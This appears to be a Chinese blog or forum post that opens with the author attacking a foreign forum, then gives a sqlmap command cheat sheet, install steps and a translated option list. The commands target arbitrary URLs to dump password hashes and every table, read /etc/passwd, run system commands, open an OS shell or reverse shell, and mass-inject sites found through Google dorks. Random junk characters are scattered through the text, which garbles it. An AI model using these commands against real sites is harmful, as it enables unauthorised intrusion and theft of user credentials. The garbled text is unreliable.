今天搞国外的一个论坛。发现萝卜和穿山甲都无法正常注入,实在没办法了 还是临时学习了下国外的神器sqlmap的使用方法,,直接做个记录、、
( k2 H6 V3 P" @3 X( M2 Osqlmap -u “http://url/news?id=1″ –current-user #获取当前用户名称sqlmap -u “http://www.xxoo.com/news?id=1″ –current-db #获取当前数 据库名称
5 S" ?0 g$ e# |# usqlmap -u “http://www.xxoo.com/news?id=1″ –tables -D “db_name”#列 表名, s$ \& U8 d! j+ y. d6 A
sqlmap -u “http://url/news?id=1″ –columns -T “tablename”users-D “db_name”-v 0 #列字段
, {( Z2 m6 E* } : b! r+ o, W9 `$ m1 W; F/ T6 {
sqlmap -u “http://url/news?id=1″ –dump -C “column_name” -T “table_name”-D “db_name”-v
. Z1 ]- w: K* k9 ^; c) g0 #获取字段内容
% F/ x6 q: D& B6 K2 h/ j
6 X2 `& e8 c6 M& Q" T******************信息获取******************
{% \: } p( F' Msqlmap -u “http://url/news?id=1″ –dbms “Mysql” –users # dbms 指定数 据库类型
; z/ X! { F2 ?9 W4 O$ usqlmap -u “http://url/news?id=1″ –users #列数据库用户
; X% W* Q5 |' V6 s S- Tsqlmap -u “http://url/news?id=1″ –dbs#列数据库
4 t Q" Q! d) Fsqlmap -u “http://url/news?id=1″ –passwords #数据库用户密码5 P# j0 Z4 U: p x- p# O/ h) h
sqlmap -u “http://url/news?id=1″ –passwords-U root -v 0 #列出指定用户 数据库密码
) Q+ I# k( D% u( ysqlmap -u “http://url/news?id=1″ –dump -C “password,user,id” -T “tablename”-D “db_name”7 p* ]) s( \9 D% [; e
–start 1 –stop 20 #列出指定字段,列出20 条
& `& ^1 G- e. Q* H1 osqlmap -u “http://url/news?id=1″ –dump-all -v 0 #列出所有数据库所有表
( ~+ k% {& [7 W$ x) g, _sqlmap -u “http://url/news?id=1″ –privileges #查看权限9 d( ]" J* Q& x _5 f
sqlmap -u “http://url/news?id=1″ –privileges -U root #查看指定用户权限sqlmap -u “http://url/news?id=1″ –is-dba -v 1 #是否是数据库管理员sqlmap -u “http://url/news?id=1″ –roles #枚举数据库用户角色& M' K. e! x4 f
sqlmap -u “http://url/news?id=1″ –udf-inject #导入用户自定义函数(获取 系统权限!)
4 o8 n$ x/ E; asqlmap -u “http://url/news?id=1″ –dump-all –exclude-sysdbs -v 0 #列 出当前库所有表7 S' R- ^) g( M, _. T1 x
sqlmap -u “http://url/news?id=1″ –union-cols #union 查询表记录
2 h' [" h1 l( ^sqlmap -u “http://url/news?id=1″ –cookie “COOKIE_VALUE”#cookie注入 k- [ I2 W$ j% L# ~% r. P
sqlmap -u “http://url/news?id=1″-b #获取banner信息. l" x2 l0 m; p( l# J) g
sqlmap -u “http://url/news?id=1″ –data “id=3″#post注入
" _9 Q% y0 k' m- S8 \, f2 bsqlmap -u “http://url/news?id=1″-v 1 -f #指纹判别数据库类型: k- M, q$ b S1 W0 h8 z$ S D, R
sqlmap -u “http://url/news?id=1″ –proxy“http://127.0.0.1:8118” #代理注 入
% p, }3 m) j1 r) Fsqlmap -u “http://url/news?id=1″–string”STRING_ON_TRUE_PAGE”# 指 定关键词
- J* x; F2 Z- k$ f# `5 y+ |" rsqlmap -u “http://url/news?id=1″ –sql-shell #执行指定sql命令) ?# C/ r' _6 P- M! V
sqlmap -u “http://url/news?id=1″ –file /etc/passwd F! n, r/ d1 g. I" V
sqlmap -u “http://url/news?id=1″ –os-cmd=whoami #执行系统命令
& O1 P/ l9 h! a6 @& y) Bsqlmap -u “http://url/news?id=1″ –os-shell #系统交互shell sqlmap -u “http://url/news?id=1″ –os-pwn #反弹shell& O. M% B- S# o8 [/ B
sqlmap -u “http://url/news?id=1″ –reg-read #读取win系统注册表
/ J7 c; E, |0 Y1 x# p- {" [sqlmap -u “http://url/news?id=1″ –dbs-o “sqlmap.log”#保存进度
0 A p) A! F, `4 {sqlmap -u “http://url/news?id=1″ –dbs -o “sqlmap.log” –resume #恢复 已保存进度) ] o9 E7 m7 C+ S$ T
***********高级用法*************
. |2 c2 t4 P* J9 \( L$ s-p name 多个参数如index.php?n_id=1&name=2&data=2020 我们想指定name参数进行注入# C, D+ M! P; M
sqlmap -g “google语法” –dump-all –batch #google搜索注入点自动 跑出 所有字段 需保证google.com能正常访问5 {4 I: z. w4 F i& O1 M
–technique 测试指定注入类型\使用的技术" a! r3 U4 c; h* E
不加参数默认测试所有注入技术. u' n9 m4 V( r- O; Q
• B: 基于布尔的SQL 盲注* q, m. b! A8 L+ ]* x9 R
• E: 基于显错sql 注入6 I, Z$ {$ R% M
• U: 基于UNION 注入% R& Z5 ]% a( ?+ |% A1 q: r
• S: 叠层sql 注入. N6 @ T1 ~7 X, Q( a* C8 `
• T: 基于时间盲注# V9 k/ P! w1 a; F8 | a4 d
–tamper 通过编码绕过WEB 防火墙(WAF)Sqlmap 默认用char(). H! I6 A/ C% h8 K; W
–tamper 插件所在目录
' ~- D A6 W, l4 W/ _7 N. G: Y/ z" y\sqlmap-dev\tamper
7 S, f$ `5 b' t3 Rsqlmap -u “http:// www.2cto.com /news?id=1″ –smart –level 3 –users # smart 智 能- O3 ^, Q$ l: ?: r
level 执行测试等级 攻击实例:
8 U& |8 `3 y' v7 d( _ ]* p8 DSqlmap -u “http://url/news?id=1&Submit=Submit”8 g& l* [4 b3 ^3 o' F0 |( ~
–cookie=”PHPSESSID=41aa833e6d0d L% Q2 B* z; `+ i3 u x- `% U
28f489ff1ab5a7531406″ –string=”Surname” –dbms=mysql –user
5 R% L# y3 y5 @. ^" H; h–password) O; g# `/ q! g9 T; L
参考文档:http://sqlmap.sourceforge.net/doc/README.html
* @% }3 L" v) `- T6 p, w/ u, j***********安装最新版本*************
$ E/ Y9 {+ n1 ^ubuntu 通过apt-get install 安装的sqlmap版本为0.6 我们通过svn 来安装 为 最新1.0版 x1 f0 Z/ L1 [6 P) C
sudo svn checkout https://svn.sqlmap.org/sqlmap/trunk/sqlmap sqlmap-dev
. A5 K, d/ C, L. O2 |0 m- `安装的位置为:/home/当前用户/sqlmap-dev/sqlmap.py 直接执行/home/当前用户/sqlmap-dev/sqlmap.py –version 这样很不方便 我们可以设置.bashrc 文件 C/ [; T2 I4 M6 g. Q% Z7 L
sudo vim /home/当前用户/.bashrc
9 n/ x0 x5 @( Z( E$ P- T#任意位置加上:
r! T% L; D& L: H/ E8 A3 Lalias sqlmap=’python /home/seclab/sqlmap-dev/sqlmap.py’ 该环境变量只对当前用户有效2 c4 N, q: J! d& _, t9 F3 ^4 [) A( u: O
如果想对所有用户有效 可设置全局 编辑下面的文件
1 x, x) S, _) m- e; } D) o$ Bvim /etc/profile2 N6 E' l& ~% f6 L9 I! m& E* f" k- c
同样加上:
/ y7 ]& z' w. f% I7 M0 ^alias sqlmap=’python /home/seclab/sqlmap-dev/sqlmap.py’ 重启生效
& V( v F6 @7 B( r+ O% E******************windows 7 (x64) sqlmap install (SVN)************+ g+ h5 _" J0 t4 V9 W S" Z
http://www.python.org/getit/ 安装python# c. Z; [- Z+ ^+ {* `( }, v8 I9 o" ~) `
http://www.sliksvn.com/en/download 安装windows svn client" u$ F0 `' d$ ?# \( T
svn checkout https://svn.sqlmap.org/sqlmap/trunk/sqlmap sqlmap-dev
) `4 q* V8 M) U3 w: D安装sqlmap3 q$ `9 @% l4 ` a* j/ x, S
*修改环境变量6 w# ^ ~. T0 S0 u
–version 显示程序的版本号并退出
* t+ E: n/ \' b3 J8 \( L P: B-h, –help 显示此帮助消息并退出/ K. V/ X# ^. j7 ~3 q) G0 \: R
-v VERBOSE 详细级别:0-6(默认为1)
/ N* O5 ?" j9 G. \0 Q6 X- T, PTarget(目标): 以下至少需要设置其中一个选项,设置目标URL。. E0 }3 r3 P3 w2 D* G
-d DIRECT 直接连接到数据库。) y. _ n7 _- [& V9 A: Y4 _
-u URL, –url=URL 目标URL。
. a5 E; _. Z) t0 i3 q-l LIST 从Burp 或WebScarab 代理的日志中解析目标。6 O# G2 g$ `" U
-r REQUESTFILE 从一个文件中载入HTTP 请求。& W9 Q" T$ S' ^5 a/ }4 u6 G! X( Q" v
-g GOOGLEDORK 处理Google dork 的结果作为目标URL。
8 ~! {3 k- p' L, `+ {$ x) I n-c CONFIGFILE 从INI 配置文件中加载选项。
, @" _4 `! d# b7 m' G3 K; V5 GRequest(请求)::- O3 Y# d& x2 \" k: c2 a2 l
这些选项可以用来指定如何连接到目标URL。
" i& k! y# H( M/ R- `–data=DATA 通过POST 发送的数据字符串
" q2 B. [, ]1 ^) L; m6 d& {–cookie=COOKIE HTTP Cookie 头
7 n+ C# ]5 b, |2 m. {; T; o–cookie-urlencode URL 编码生成的cookie 注入- z8 ~: f* ~+ w6 q
–drop-set-cookie 忽略响应的Set –Cookie 头信息6 E& d6 D' O/ {! [; }
/ M+ U# o) J/ I e S' S–user-agent=AGENT 指定 HTTP User –Agent 头( A; x" |' c5 l- @
–random-agent 使用随机选定的HTTP User –Agent 头8 i# ?1 f9 { {+ [. w
–referer=REFERER 指定 HTTP Referer 头
) b' w5 J. M: D8 O–headers=HEADERS 换行分开,加入其他的HTTP 头
! ?, N9 e$ k5 K) o–auth-type=ATYPE HTTP 身份验证类型(基本,摘要或NTLM)(Basic, Digest or NTLM)! Q" ^! @; P% H/ t
–auth-cred=ACRED HTTP 身份验证凭据(用户名:密码)1 u1 w* E7 I" u5 R3 T! G
–auth-cert=ACERT HTTP 认证证书(key_file,cert_file)/ t# n2 ]& E' |, Z$ ^7 B6 i7 v6 y
–proxy=PROXY 使用HTTP 代理连接到目标URL
2 |. r* L& t" t( S* G3 g6 P4 ?$ C–proxy-cred=PCRED HTTP 代理身份验证凭据(用户名:密码)+ M6 l5 b- _# V3 Z
–ignore-proxy 忽略系统默认的HTTP 代理
4 ?+ l2 i3 B0 n$ Z–delay=DELAY 在每个HTTP 请求之间的延迟时间,单位为秒7 v. i- a) O' [9 E" d
–timeout=TIMEOUT 等待连接超时的时间(默认为30 秒)# l2 `7 `% o3 j. M6 Q
–retries=RETRIES 连接超时后重新连接的时间(默认3)
& j, P1 G i, c* O* w3 R' t1 R9 j! l–scope=SCOPE 从所提供的代理日志中过滤器目标的正则表达式5 l r! s* j: i' g) J
–safe-url=SAFURL 在测试过程中经常访问的url 地址
% q- v+ J3 G6 O3 l) I; M7 J, m7 [- s–safe-freq=SAFREQ 两次访问之间测试请求,给出安全的URL
1 {# ^! j5 t. d \* y# nOptimization(优化): 这些选项可用于优化SqlMap 的性能。
9 j# c) Y- G# Q- Z-o 开启所有优化开关
, e) v% Y* n, J+ l9 Q! \% i1 g–predict-output 预测常见的查询输出5 Z- c6 \0 u" C! K* j
–keep-alive 使用持久的HTTP(S)连接8 L0 R l( D+ ~/ k b
–null-connection 从没有实际的HTTP 响应体中检索页面长度
6 Q0 U8 n7 U! z/ \' h( C6 E–threads=THREADS 最大的HTTP(S)请求并发量(默认为1)3 H0 s% S" X' m$ A1 a
Injection(注入):: }( o1 M- U% I# E
这些选项可以用来指定测试哪些参数, 提供自定义的注入payloads 和可选篡改脚本。
" F2 I2 g+ |7 N/ \! x& n1 i-p TESTPARAMETER 可测试的参数(S)
8 [& C( s- {9 G8 F; d–dbms=DBMS 强制后端的DBMS 为此值1 }$ }' J; G/ k' R9 D1 _
–os=OS 强制后端的DBMS 操作系统为这个值
/ _8 \, J5 x3 _' @–prefix=PREFIX 注入payload 字符串前缀8 z# D0 W9 i; n O8 D) e( a
–suffix=SUFFIX 注入 payload 字符串后缀. }2 J, C* H' Z) G
–tamper=TAMPER 使用给定的脚本(S)篡改注入数据' g9 h% P# v: @# U @0 R* j* e. b( r
Detection(检测):
% l; ~4 w. b3 `$ d! y这些选项可以用来指定在SQL 盲注时如何解析和比较HTTP 响应页面的内容。8 z/ k% l) w0 ~7 V4 n7 y
–level=LEVEL 执行测试的等级(1-5,默认为1)# E g/ P4 ?5 v c F
–risk=RISK 执行测试的风险(0-3,默认为1)
* L3 L [. V, K$ P9 t–string=STRING 查询时有效时在页面匹配字符串4 R0 z; A3 n3 q3 }7 H) l
–regexp=REGEXP 查询时有效时在页面匹配正则表达式" Y/ W& Y/ O8 _: l: N
–text-only 仅基于在文本内容比较网页
/ N4 q2 n3 _- b0 ITechniques(技巧): 这些选项可用于调整具体的SQL 注入测试。3 \" R) ~. ?/ i0 U' F
–technique=TECH SQL 注入技术测试(默认BEUST)" E! |" Y/ V6 u" c7 @# w# Y
–time-sec=TIMESEC DBMS 响应的延迟时间(默认为5 秒), B: E: w' P$ A! W/ D/ o" G) T
–union-cols=UCOLS 定列范围用于测试UNION 查询注入& F3 `5 F$ x8 t
–union-char=UCHAR 用于暴力猜解列数的字符
% e" V8 F+ g% n# XFingerprint(指纹):
$ ^+ X7 v& w! y-f, –fingerprint 执行检查广泛的DBMS 版本指纹5 w0 R7 H t+ `' J
Enumeration(枚举):
$ z. V9 [+ r$ L F& P, {1 F
+ t! j: ~2 N& n' t这些选项可以用来列举后端数据库管理系统的信息、表中的结构和数据。此外,您还可以运行您自己 的SQL 语句。: e1 Y7 Y/ U. d7 g# s# h
-b, –banner 检索数据库管理系统的标识
! U% k4 E& U3 }, Y: I( L3 P B–current-user 检索数据库管理系统当前用户
! I4 l9 G! ]8 z& a; N–current-db 检索数据库管理系统当前数据库3 K/ N" L2 G. `& {8 i4 C, i, R) \
–is-dba 检测DBMS 当前用户是否DBA
9 a( s' _$ U6 H) a( R% T9 p–users 枚举数据库管理系统用户: [: N2 t+ t, V# o
–passwords 枚举数据库管理系统用户密码哈希7 T9 D# q, R1 n; O. c V
–privileges 枚举数据库管理系统用户的权限
; w) m! `- ^& h! R' {–roles 枚举数据库管理系统用户的角色
m, l$ i9 n3 e$ W4 H–dbs 枚举数据库管理系统数据库
! z+ C4 l; B: x$ c" t5 }–tables 枚举的DBMS 数据库中的表/ K7 X3 E5 i8 t5 M2 q4 ~% a
–columns 枚举DBMS 数据库表列& I9 k) g2 r/ X9 C( m1 Y3 p. f1 O% ~
–dump 转储数据库管理系统的数据库中的表项1 |) b; F$ }' ?; g
–dump-all 转储所有的DBMS 数据库表中的条目% o+ O9 P s% _/ a L; A
–search 搜索列(S),表(S)和/或数据库名称(S)
& F1 S w/ z' y8 D7 D+ z! h; Q-D DB 要进行枚举的数据库名
( x$ W3 y! O7 t+ A ?; j: G: @-T TBL 要进行枚举的数据库表3 @" L/ P0 W/ l \
-C COL 要进行枚举的数据库列 L. ^$ n0 M8 a8 g( l7 Q
-U USER 用来进行枚举的数据库用户
' C) j7 f7 c& @( X–exclude-sysdbs 枚举表时排除系统数据库
9 ^! l; T3 } Y6 k) w4 ~% h, w. d–start=LIMITSTART 第一个查询输出进入检索1 z/ {* D+ ^2 v- G' a$ Z8 q
–stop=LIMITSTOP 最后查询的输出进入检索! ]3 t# i3 R4 k8 g
–first=FIRSTCHAR 第一个查询输出字的字符检索' Z! [$ e5 Y+ ?( ?: b9 e& l, I/ S
–last=LASTCHAR 最后查询的输出字字符检索1 S3 k& d0 O* V2 \* _
–sql-query=QUERY 要执行的SQL 语句
" B# o5 V+ w8 W K! o7 T–sql-shell 提示交互式SQL 的shell! P! H# U' ^( }8 V- M: a2 {# f
Brute force(蛮力): 这些选项可以被用来运行蛮力检查。2 y, {; \/ E; i# J# Z) b2 v4 p' H
–common-tables 检查存在共同表 r+ @; O( s# d
–common-columns 检查存在共同列. w0 b6 j2 @6 z7 U- s3 I5 P+ u
User-defined function injection(用户自定义函数注入): 这些选项可以用来创建用户自定义函数。3 _: \( i+ U7 A- ^
–udf-inject 注入用户自定义函数- K- p/ E" s. m; N. f; q1 O+ m3 \
–shared-lib=SHLIB 共享库的本地路径+ h- |( b: z# R6 B& E1 N$ _7 }
File system access(访问文件系统): 这些选项可以被用来访问后端数据库管理系统的底层文件系统。5 [1 K9 {4 `& o3 T' L9 S& j% A
–file-read=RFILE 从后端的数据库管理系统文件系统读取文件% {: r8 S/ o0 U* q' w
–file-write=WFILE 编辑后端的数据库管理系统文件系统上的本地文件
0 U N4 `2 |+ q* J+ x& _1 p: q–file-dest=DFILE 后端的数据库管理系统写入文件的绝对路径6 d$ p& k# I/ |/ w4 }
Operating system access(操作系统访问): 这些选项可以用于访问后端数据库管理系统的底层操作系统。; M, e5 l0 S, z" N+ d" C
–os-cmd=OSCMD 执行操作系统命令$ `6 R/ X+ ~ t8 o$ u
–os-shell 交互式的操作系统的shell
) t t; g# i. x–os-pwn 获取一个OOB shell,meterpreter 或VNC; m% O0 C! `7 E! d
–os-smbrelay 一键获取一个OOB shell,meterpreter 或VNC D+ Q' z' z3 ?1 D3 S
–os-bof 存储过程缓冲区溢出利用
9 s Y! W# d4 _' S–priv-esc 数据库进程用户权限提升" j. _. V. V, B7 I
–msf-path=MSFPATH Metasploit Framework 本地的安装路径
* H( h! Y( M! d7 [–tmp-path=TMPPATH 远程临时文件目录的绝对路径
. H9 J1 S9 \% k2 ^' f+ [ ; I7 W7 I& ~5 n" s) V. X, V; E
Windows 注册表访问: 这些选项可以被用来访问后端数据库管理系统Windows 注册表。( D. c3 c; ~% c- Z- F; Q
–reg-read 读一个Windows 注册表项值: h& i& @5 e" q- J0 ]
–reg-add 写一个Windows 注册表项值数据: Z/ P/ }" V2 H4 m
–reg-del 删除Windows 注册表键值8 m* q0 g4 J4 _# y
–reg-key=REGKEY Windows 注册表键
* t, J- Y* l `6 e$ m1 t0 p–reg-value=REGVAL Windows 注册表项值9 }* E5 u N v; @2 p4 w$ D
–reg-data=REGDATA Windows 注册表键值数据
. j! l! ~& ]# V E. z6 f–reg-type=REGTYPE Windows 注册表项值类型' I! P5 W9 I8 ?/ ]
General(一般): 这些选项可以用来设置一些一般的工作参数。" \" H7 g$ O( J: i& C0 X& b
-t TRAFFICFILE 记录所有HTTP 流量到一个文本文件中9 [' j$ F4 e; T
-s SESSIONFILE 保存和恢复检索会话文件的所有数据! I: E9 w- @# Y% ~2 n. U. W. ~; z
–flush-session 刷新当前目标的会话文件) @7 S8 R% _; G2 n+ v
–fresh-queries 忽略在会话文件中存储的查询结果
' E* e. p9 A# A% \& G7 }7 W–eta 显示每个输出的预计到达时间
7 |2 D, q* D7 W; I" D" f–update 更新SqlMap9 I6 v( w- P7 z7 I: @2 a
–save file 保存选项到INI 配置文件" I" _- ^ ~! X6 J: p/ h
–batch 从不询问用户输入,使用所有默认配置。
* C6 C6 C1 w1 N, B. C! I% F7 ZMiscellaneous(杂项):
# C2 f/ f& M* C3 b+ r# W–beep 发现SQL 注入时提醒8 Z0 r9 R6 [& z, P
–check-payload IDS 对注入payloads 的检测测试1 _0 {) _( a: e' L7 p" ^
–cleanup SqlMap 具体的UDF 和表清理DBMS
2 p+ b) `; o% T0 o–forms 对目标URL 的解析和测试形式- U0 o/ F2 t; O! ^. H, S6 O9 P
–gpage=GOOGLEPAGE 从指定的页码使用谷歌dork 结果
* ~0 G3 d: z- U–page-rank Google dork 结果显示网页排名(PR)
3 i! x j) B8 S1 N% N. Y–parse-errors 从响应页面解析数据库管理系统的错误消息
& H$ D: {+ u+ @ K7 J–replicate 复制转储的数据到一个sqlite3 数据库
|7 A4 v) y. [ o- |–tor 使用默认的Tor(Vidalia/ Privoxy/ Polipo)代理地址
- H* E; Z/ p, V5 O' m–wizard 给初级用户的简单向导界面 |